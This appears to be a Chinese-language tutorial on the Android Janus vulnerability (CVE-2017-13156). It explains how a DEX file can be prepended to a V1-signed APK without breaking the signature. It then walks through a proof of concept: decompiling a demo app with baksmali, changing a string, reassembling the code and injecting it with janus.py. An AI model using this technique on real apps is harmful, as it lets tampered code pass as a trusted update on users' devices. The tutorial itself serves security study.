0x1 背景

Android系统要求每一个Android应用程序必须要经过数字签名才能够安装到系统中，也就是说如果一个Android应用程序没有经过数字签名，是没有办法安装到系统中的。Android通过数字签名来标识应用程序的作者和在应用程序之间建立信任关系，不是用来决定最终用户可以安装哪些应用程序。这个数字签名由应用程序的作者完成，并不需要权威的数字证书签名机构认证，它只是用来让应用程序包自我认证的。然而Google在本月4日发布的Android安全公告中编号为CVE-2017-13156，这个漏洞被称为Janus漏洞，利用该漏洞可修改app而不影响原始签名。

0x2 利用点

Janus 漏洞（CVE-2017-13156）允许攻击者修改应用程序中的代码，而不会影响其签名。理论上，Android运行时加载APK文件，提取其DEX文件，然后运行其代码。实际上，虚拟机可以加载和执行APK文件和DEX文件。当它获得一个APK文件时，它仍然会查看标题中的魔术字节来决定它是哪种类型的文件。如果找到DEX标头，则将文件加载为DEX文件。否则，它将文件加载为包含带有DEX文件的zip条目的APK文件。因此它可能会误解双重DEX / APK文件。

攻击者可以利用这种二元性。他可以将恶意DEX文件添加到APK文件中，而不会影响其签名。然后，Android运行时接受APK文件作为合法早期版本的应用程序的有效更新。但是，Dalvik VM从注入的DEX文件加载代码。

要求

1、Janus漏洞影响运行Android 5.0+的设备
2、多用几个手机测试
3、下载工具
4、Python 2.7

0x3 编写主程序

主要apk代码

image.png

import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity implements View.OnClickListener{

    private Button button;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        button = (Button) findViewById(R.id.button);
        button.setOnClickListener(this);
    }

    @Override
    public void onClick(View v) {
        Toast.makeText(getApplicationContext(),"I am hooray",Toast.LENGTH_LONG).show();
    }
}

生成apk，只使用V1签名，不使用V2签名,如下:

image.png

运行结果如图：

image.png

使用GetApkInfo.jar查看签名信息java -jar GetApkInfo.jar Janus.apk：

image.png

发现没有经过V2签名

0x4 利用poc

将编译好的apk解压得到dex文件，baksmali.jar
反编译dex文件得到smali代码
java -jar baksmali.jar d classes.dex
会生成一个out目录，找到需要修改的地方，比如将hooray改成另外一个字符串，修改如下:

image.png

重打包dex，如下
java -jar smali.jar assemble out
生成out.dex，将dex放入原Janus.apk里,janus.py下载
python janus.py out.dex Janus.apk op.apk
运行op.apk(需要在5.0以上运行,我在8.0的手机上无法安装op.apk)